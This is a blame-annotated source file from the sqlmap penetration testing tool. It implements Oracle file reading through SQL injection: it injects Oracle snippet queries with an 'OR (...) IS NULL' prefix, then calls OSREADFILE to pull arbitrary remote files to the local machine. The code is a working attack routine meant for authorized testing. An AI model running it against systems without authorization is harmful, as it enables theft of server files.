2019-05-08 13:47:52 +03:00
|
|
|
#!/usr/bin/env python
|
2010-03-23 01:57:57 +03:00
|
|
|
|
|
|
|
|
"""
|
2022-01-03 13:30:34 +03:00
|
|
|
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
|
2017-10-11 15:50:46 +03:00
|
|
|
See the file 'LICENSE' for copying permission
|
2010-03-23 01:57:57 +03:00
|
|
|
"""
|
|
|
|
|
|
2019-06-03 15:21:26 +03:00
|
|
|
from lib.core.agent import agent
|
|
|
|
|
from lib.core.common import dataToOutFile
|
|
|
|
|
from lib.core.common import decodeDbmsHexValue
|
|
|
|
|
from lib.core.common import getSQLSnippet
|
2019-06-06 12:44:27 +03:00
|
|
|
from lib.core.common import isNoneValue
|
2019-06-03 15:21:26 +03:00
|
|
|
from lib.core.data import kb
|
|
|
|
|
from lib.core.data import logger
|
|
|
|
|
from lib.core.enums import CHARSET_TYPE
|
|
|
|
|
from lib.core.enums import DBMS
|
2012-12-06 17:14:19 +04:00
|
|
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
2019-06-03 15:21:26 +03:00
|
|
|
from lib.request import inject
|
|
|
|
|
from lib.request.connect import Connect as Request
|
2010-03-23 01:57:57 +03:00
|
|
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
|
|
|
|
|
|
|
|
|
class Filesystem(GenericFilesystem):
|
2019-06-03 11:41:51 +03:00
|
|
|
def readFile(self, remoteFile):
|
2019-06-03 15:21:26 +03:00
|
|
|
localFilePaths = []
|
|
|
|
|
snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension")
|
|
|
|
|
|
|
|
|
|
for query in snippet.split("\n"):
|
|
|
|
|
query = query.strip()
|
|
|
|
|
query = agent.prefixQuery("OR (%s) IS NULL" % query)
|
|
|
|
|
query = agent.suffixQuery(query, trimEmpty=False)
|
|
|
|
|
payload = agent.payload(newValue=query)
|
|
|
|
|
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
|
|
|
|
|
|
|
|
|
|
for remoteFile in remoteFile.split(','):
|
2019-06-27 18:28:43 +03:00
|
|
|
if not kb.bruteMode:
|
|
|
|
|
infoMsg = "fetching file: '%s'" % remoteFile
|
|
|
|
|
logger.info(infoMsg)
|
2019-06-03 15:21:26 +03:00
|
|
|
|
|
|
|
|
kb.fileReadMode = True
|
|
|
|
|
fileContent = inject.getValue("SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL)
|
|
|
|
|
kb.fileReadMode = False
|
|
|
|
|
|
2019-06-06 12:44:27 +03:00
|
|
|
if not isNoneValue(fileContent):
|
2019-06-03 15:21:26 +03:00
|
|
|
fileContent = decodeDbmsHexValue(fileContent, True)
|
|
|
|
|
|
2019-06-27 18:28:43 +03:00
|
|
|
if fileContent.strip():
|
2019-06-03 15:21:26 +03:00
|
|
|
localFilePath = dataToOutFile(remoteFile, fileContent)
|
|
|
|
|
localFilePaths.append(localFilePath)
|
2019-06-27 18:28:43 +03:00
|
|
|
|
|
|
|
|
elif not kb.bruteMode:
|
2019-06-06 12:44:27 +03:00
|
|
|
errMsg = "no data retrieved"
|
|
|
|
|
logger.error(errMsg)
|
2019-06-03 15:21:26 +03:00
|
|
|
|
|
|
|
|
return localFilePaths
|
2010-03-23 01:57:57 +03:00
|
|
|
|
2019-06-03 11:41:51 +03:00
|
|
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "File system write access not yet implemented for "
|
2010-03-23 01:57:57 +03:00
|
|
|
errMsg += "Oracle"
|
2013-01-04 02:20:55 +04:00
|
|
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
